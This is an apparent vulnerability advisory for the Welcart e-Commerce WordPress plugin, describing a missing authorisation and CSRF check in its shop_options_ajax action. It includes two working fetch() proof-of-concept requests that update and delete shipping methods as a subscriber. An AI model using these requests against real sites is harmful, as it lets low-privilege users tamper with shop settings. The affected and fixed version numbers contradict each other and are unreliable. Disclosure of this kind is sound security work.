WordPress Plugin Vulnerabilities
Welcart e-Commerce < 2.8.4 - Subscriber+ Arbitrary Shipping Method Creation/Update/Deletion
Description
The plugin does not have authorisation and CSRF in an AJAX action, allowing any logged-in user to create, update and delete shipping methods.
Proof of Concept
wp_ajax_shop_options_ajax hook calls shop_options_ajax() function without nonce and without access control
update shipping method name (#0 shipping method id) exploit:
fetch('http://localhost/wp-admin/admin-ajax.php', {
method: 'POST',
headers: new Headers({
'Content-Type': 'application/x-www-form-urlencoded',
}),
body: 'action=shop_options_ajax&mode=update_delivery_method&name=UPDATE&id=0&time=&charge=-1&days=-1&nocod=0&intl=0&cool_category=0'
}).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));
The exploit requires at least a subscriber role.
---
delete shipping method (#0 shipping method id) exploit:
fetch('http://localhost/wp-admin/admin-ajax.php', {
method: 'POST',
headers: new Headers({
'Content-Type': 'application/x-www-form-urlencoded',
}),
body: 'action=shop_options_ajax&mode=delete_delivery_method&id=0'
}).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));
The exploit requires at least a subscriber role. Affects Plugins
Fixed in version 2.7.8
References
Classification
Miscellaneous
Original Researcher
Lana Codes
Submitter
Lana Codes
Submitter website
Submitter twitter
Verified
Yes
Timeline
Publicly Published
2022-11-21 (about 10 months ago)
Added
2022-11-21 (about 10 months ago)
Last Updated
2022-11-21 (about 10 months ago)